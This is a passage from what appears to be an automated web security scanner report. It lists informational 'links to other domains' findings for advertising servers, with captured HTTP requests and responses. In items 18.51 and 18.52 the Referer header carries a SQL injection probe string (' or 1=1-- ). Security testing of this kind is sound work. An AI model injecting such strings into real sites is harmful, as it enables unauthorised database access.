...[SNIP]...
18.46. http://ad.doubleclick.net/adj/ugo.ugo.ugohome/ugohome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ugo.ugo.ugohome/ugohome

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ugo.ugo.ugohome/ugohome;dev=false;pt=mainpage;river=true;rb=true;;sz=288x162;pos=top;tile=3;ord=5174952836? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 248
Date: Sat, 17 Sep 2011 16:24:43 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/p;44306;0-0;0;33074931;34827-288/162;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
18.47. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26991068&ahcid=2258492&bimpd=c0kXsHsHSmeWhZYTREYe0sDSKE-xOvuwO8-xBmkdnWTmd5_aKWO6mmbmOGROIvvjj9EzkS_bBaiJEcR9R3jrevQ2ov8F96a44-ogx0KaEDnyApHz0cTr9LeydkTtbIhVaX2nKNkPJtLnVJH8FV4Dd2BZLb2fS1F5Scj_HvzyiMK3eTg-fysVL4NxFZ5v_CHNlgeNc_NrCEydDCc3CvAgfciaxPgesnMeI3JvshK38UBwenoB9eDr_loazeBgGYAmLXXmgJH1qmmEMYCR4OpdnlcwHwG_6JrrgxV7HzVF-v697ZaK9XBtZEQvEubwtYTVVBQLLq7j6F3iNOZuKo0JXQPRebdb04CqsJUmdmy5UnsfWiULP-ZEZGDt0IqdLMwBsr6a6YqtrLJT4cqZXQrL0WsP7Y21jDNEz-UXSM73TSxwkoE4Thgw2wlkh46ZlsDWqZUn-7KntDl9L8p4pH9fDXaoBUsWtsZZqH0CVvFPBCr_mAo4nf999NQU7V_JRN_j4QimPJYaK6Zn7b8VCPKVAbGFEBRqN0QbGT1SlHKoMnOUwz1lVaf0RwqnshRhX3_tvfBz5xDsVEqchMpjM7fNhTuRxuor1fpv-a1IFOILXaD947Yd5VEVT_VqJa1Vb2COvVyAA-f4Y6G0narfvPyHg4AnIT2lP-u4t0jxCVmL47PZzw7Sqi-NDB9GTcO6mju0gCchPaU_67i3SPEJWYvjs68UD5-6O6nTMWAZudI3ppObRohoymHI1165xYwXluCxcKUsk3pyz8E7r6AyUKnzbf23BOOYN5DOwJ7MDeQLuEvq0tQJszidBUwiqxGdKZ-CEvmONAwrRCaTz4lB29IygQ&acp=1.01 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf?t=1316294786641&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.quickandsimple.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15228%7C15234%7C15228%7C15228%7C15231; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 19 Sep 2011 16:37:00 GMT
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:37:00 GMT
Content-Length: 8525


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n        \n                \n        <a target="turn_ad_landing_page" href="http://www.smokeybear.com"><img border="0" src="http://img.turn.com/img/server/ads/ps/728x90.jpg">
...[SNIP]...
18.48. http://adsfac.us/ag.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ag.asp?cc=ETN002.315724.0&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl= HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 4185
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSETN002=pctl=315724&pctm=2&FL315724=2&pctc=39594&FQ=2&fpt=0%2C315724%2C&pct%5Fdate=4277&FM39594=2; expires=Mon, 17-Oct-2011 16:38:20 GMT; domain=.adsfac.us; path=/
Set-Cookie: FSETN002315724=uid=17417248; expires=Sun, 18-Sep-2011 16:38:20 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652; expires=Mon, 17-Oct-2011 16:38:20 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:19 GMT
Connection: close

<html><head></head><body><script type="text/javascript">var fd_imp='http://adsfac.us/creative.asp?CreativeID=39594';var fd_clk='http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sd
...[SNIP]...
<noscript><a target="_blank" href="http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=http://adsfac.us/link.asp?cc=ETN002.315724.0&CreativeID=39594"><img width="728" height="90" border="0" src="http://adsfac.us/creative.asp?CreativeID=39594&bk=1">
...[SNIP]...
18.49. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adunit.cdn.auditude.com
Path:   /flash/modules/display/auditudeDisplayLib.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/modules/display/auditudeDisplayLib.js?callback=ndn.auditudeCallback&width=300&height=225&version=adunit-1.0&domain=auditude.com&zoneId=50912&mediaId=23408962&parentNode=auditudeContent&keyValues=dpid=90009;sitesection=stamford_hom;sec=hom;sub=;wgt=1;width=300;height=225;url=http://www.stamfordadvocate.com/&autoPlay=true&ndnR=4060&countdownMessage=Todays%20Top%20Videos%20available%20in%20{countdown} HTTP/1.1
Host: adunit.cdn.auditude.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/common/toppicks_common1.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom&ZoneID=50912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Cache-Control: must-revalidate
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:23:15 GMT
ETag: "2736172791"
Expires: Sat, 17 Sep 2011 16:23:15 GMT
Last-Modified: Fri, 06 May 2011 17:05:19 GMT
Server: ECS (sjo/5238)
X-Cache: HIT
Content-Length: 11744

(function() {

   var PLAYER_SWF_URL = 'http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView';
   var AUD_SCRIPT_IDENTIFIER = 'auditudeDisplayLib.js';

   // Flash Player Version Detecti
...[SNIP]...
<td align="center"><a href="http://www.adobe.com/go/getflash/" style="color:white">' +
           '<span style="font-size:12px">
...[SNIP]...
18.50. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: token_nai_advertising_com=1812733584; token_nai_adsonar_com=819977518; token_nai_tacoda_at_atwola_com=1032347115; token_nai_adtech_de=8239370; token_nai_ad_us-ec_adtechus_com=1128450710; token_nai_adserver_adtechus_com=1348442932; token_nai_adserverec_adtechus_com=1581270199; token_nai_adserverwc_adtechus_com=52531776; token_nai_glb_adtechus_com=585997419; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:22:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13643


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<body onload='optOut();' >
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=1812733584' height='1' width='1'></iframe>
<br />
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=819977518' height='1' width='1'></iframe>
<br />
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=1032347115' height='1' width='1'></iframe>
<br />
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=8239370' height='1' width='1'></iframe>
<br />
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=1128450710' height='1' width='1'></iframe>
<br />
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=1348442932' height='1' width='1'></iframe>
<br />
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=1581270199' height='1' width='1'></iframe>
<br />
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=52531776' height='1' width='1'></iframe>
<br />
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=585997419' height='1' width='1'></iframe>
...[SNIP]...
18.51. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nai/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13500


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<body onload='getStatus();' >
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2195200' height='1' width='1'></iframe>
<br />
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2195200' height='1' width='1'></iframe>
<br />
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2195200' height='1' width='1'></iframe>
<br />
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2195200' height='1' width='1'></iframe>
<br />
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2195200' height='1' width='1'></iframe>
<br />
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2195200' height='1' width='1'></iframe>
<br />
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2195200' height='1' width='1'></iframe>
<br />
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2195200' height='1' width='1'></iframe>
<br />
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2195200' height='1' width='1'></iframe>
...[SNIP]...
18.52. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nai/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060'%20or%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:37:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13500


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<body onload='getStatus();' >
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3783635' height='1' width='1'></iframe>
<br />
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3783635' height='1' width='1'></iframe>
<br />
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3783635' height='1' width='1'></iframe>
<br />
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3783635' height='1' width='1'></iframe>
<br />
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3783635' height='1' width='1'></iframe>
<br />
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3783635' height='1' width='1'></iframe>
<br />
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3783635' height='1' width='1'></iframe>
<br />
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3783635' height='1' width='1'></iframe>
<br />
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3783635' height='1' width='1'></iframe>
...[SNIP]...
18.53. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nai/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13500


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<body onload='getStatus();' >
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3972342' height='1' width='1'></iframe>
<br />
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3972342' height='1' width='1'></iframe>
<br />
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3972342' height='1' width='1'></iframe>
<br />
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3972342' height='1' width='1'></iframe>
<br />
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3972342' height='1' width='1'></iframe>
<br />
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3972342' height='1' width='1'></iframe>
<br />
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3972342' height='1' width='1'></iframe>
<br />
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3972342' height='1' width='1'></iframe>
<br />
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3972342' height='1' width='1'></iframe>
...[SNIP]...
18.54. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?l=24537&sz=300x250&wr=j&t=j&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295392631%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F&r=http%3A%2F%2Fwww.seattlepi.com%2F&rnd=378488 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295392631&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=838a74cddbeb6ddecfad61578129

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:35:21 GMT
Content-Length: 1462

document.write('<div style="z-index:10; position:relative; width:300px">'+'<scr'+'ipt language="JavaScript" type="text/javascript" src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&p
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=176617&bid=1043680&lid=24537" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div>');
document.write('<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110917123522&cmxid=2101.020017661701043680xmc" style="display: none" height="1" width="1" border="0" />');var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagNam
...[SNIP]...
0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })();document.write('<script language="Javascript" type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=24537&campId=176617"></script>
...[SNIP]...
18.55. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?l=24536&sz=728x90&wr=j&t=j&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F728x90%2Fht_1064834_61686626%3Ft%3D1316295745899%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F&r=http%3A%2F%2Fwww.seattlepi.com%2F&rnd=838105 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316295745899&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
